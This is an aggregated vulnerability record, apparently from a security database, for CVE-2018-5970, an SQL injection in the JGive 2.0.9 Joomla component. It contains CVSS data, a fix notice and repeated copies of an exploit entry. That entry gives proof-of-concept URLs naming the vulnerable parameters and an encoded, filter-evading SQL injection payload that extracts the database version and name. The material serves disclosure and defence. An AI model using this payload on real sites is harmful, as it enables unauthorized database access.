Joomla! JGive 2.0.9 SQL Injection

2018-02-17T00:00:00

Description

{"id": "PACKETSTORM:146446", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla! JGive 2.0.9 SQL Injection", "description": "", "published": "2018-02-17T00:00:00", "modified": "2018-02-17T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/146446/Joomla-JGive-2.0.9-SQL-Injection.html", "reporter": "Ihsan Sencan", "references": [], "cvelist": ["CVE-2018-5970"], "lastseen": "2018-02-17T17:02:52", "viewCount": 18, "enchantments": {"score": {"value": 6.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-5970"]}, {"type": "exploitdb", "idList": ["EDB-ID:44116"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:47B0BB755FB07B30810D52C3D6548A09"]}, {"type": "joomla", "idList": ["JVEL:584"]}, {"type": "zdt", "idList": ["1337DAY-ID-29824"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-5970"]}, {"type": "exploitdb", "idList": ["EDB-ID:44116"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:47B0BB755FB07B30810D52C3D6548A09"]}, {"type": "joomla", "idList": ["JVEL:584"]}, {"type": "zdt", "idList": ["1337DAY-ID-29824"]}]}, "exploitation": null, "vulnersScore": 6.1}, "sourceHref": "https://packetstormsecurity.com/files/download/146446/joomlajgive209-sql.txt", "sourceData": "`# # # # \n# Exploit Title: Joomla! Component JGive 2.0.9 - SQL Injection \n# Dork: N/A \n# Date: 16.02.2018 \n# Vendor Homepage: http://techjoomla.com/ \n# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/donations/jgive/ \n# Version: 2.0.9 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-5970 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/index.php?option=com_jgive&view=campaigns&layout=all&filter_org_ind_type=[SQL] \n# \n# \n# 2) \n# http://localhost/[PATH]/index.php/more/campaigns-in-pin-display/campaigns/all/search/:?campaign_countries=[SQL] \n# \n# \n# # # # \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645594590}}

{"zdt": [{"lastseen": "2018-04-09T17:40:57", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-02-17T00:00:00", "type": "zdt", "title": "Joomla jGive 2.0.9 Component - SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-5970"], "modified": "2018-02-17T00:00:00", "id": "1337DAY-ID-29824", "href": "https://0day.today/exploit/description/29824", "sourceData": "# # # # \r\n# Exploit Title: Joomla! Component JGive 2.0.9 - SQL Injection\r\n# Vendor Homepage: http://techjoomla.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/donations/jgive/\r\n# Version: 2.0.9\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-5970\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_jgive&view=campaigns&layout=all&filter_org_ind_type=[SQL]\r\n# \r\n# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4\r\n# \r\n# 2)\r\n# http://localhost/[PATH]/index.php/more/campaigns-in-pin-display/campaigns/all/search/:?campaign_countries=[SQL]\r\n# \r\n# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4\r\n# \r\n# # # #\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/29824", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T18:02:13", "description": "SQL Injection exists in the JGive 2.0.9 component for Joomla! via the filter_org_ind_type or campaign_countries parameter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-17T07:29:00", "type": "cve", "title": "CVE-2018-5970", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5970"], "modified": "2018-03-02T15:52:00", "cpe": ["cpe:/a:techjoomla:jgive:2.0.9"], "id": "CVE-2018-5970", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5970", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:techjoomla:jgive:2.0.9:*:*:*:*:joomla\\!:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:24", "description": "\nJoomla! Component jGive 2.0.9 - SQL Injection", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-16T00:00:00", "title": "Joomla! Component jGive 2.0.9 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5970"], "modified": "2018-02-16T00:00:00", "id": "EXPLOITPACK:47B0BB755FB07B30810D52C3D6548A09", "href": "", "sourceData": "# # # # \n# Exploit Title: Joomla! Component JGive 2.0.9 - SQL Injection\n# Dork: N/A\n# Date: 16.02.2018\n# Vendor Homepage: http://techjoomla.com/\n# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/donations/jgive/\n# Version: 2.0.9\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-5970\n# # # #\n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC:\n# \n# 1)\n# http://localhost/[PATH]/index.php?option=com_jgive&view=campaigns&layout=all&filter_org_ind_type=[SQL]\n# \n# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4\n# \n# 2)\n# http://localhost/[PATH]/index.php/more/campaigns-in-pin-display/campaigns/all/search/:?campaign_countries=[SQL]\n# \n# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4\n# \n# # # #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "joomla": [{"lastseen": "2021-07-28T14:33:52", "description": "JGive by Techjoomla.com, versions 2.0.9 and previous, SQL Injection\n\nresolution: update to 2.0.11\n\nupdate notice: https://techjoomla.com/blog/jgive/release-updates-for-jticketing-jboloand-invitex\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-05T00:00:00", "type": "joomla", "title": "JGive, 2.0.9, SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5970"], "modified": "2018-03-05T09:39:37", "id": "JVEL:584", "href": "https://vel.joomla.org", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-04T17:35:32", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-16T00:00:00", "type": "exploitdb", "title": "Joomla! Component jGive 2.0.9 - SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["2018-5970", "CVE-2018-5970"], "modified": "2018-02-16T00:00:00", "id": "EDB-ID:44116", "href": "https://www.exploit-db.com/exploits/44116", "sourceData": "# # # # \r\n# Exploit Title: Joomla! Component JGive 2.0.9 - SQL Injection\r\n# Dork: N/A\r\n# Date: 16.02.2018\r\n# Vendor Homepage: http://techjoomla.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/donations/jgive/\r\n# Version: 2.0.9\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-5970\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_jgive&view=campaigns&layout=all&filter_org_ind_type=[SQL]\r\n# \r\n# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4\r\n# \r\n# 2)\r\n# http://localhost/[PATH]/index.php/more/campaigns-in-pin-display/campaigns/all/search/:?campaign_countries=[SQL]\r\n# \r\n# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4\r\n# \r\n# # # #", "sourceHref": "https://www.exploit-db.com/download/44116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

Joomla! JGive 2.0.9 SQL Injection

Description

Related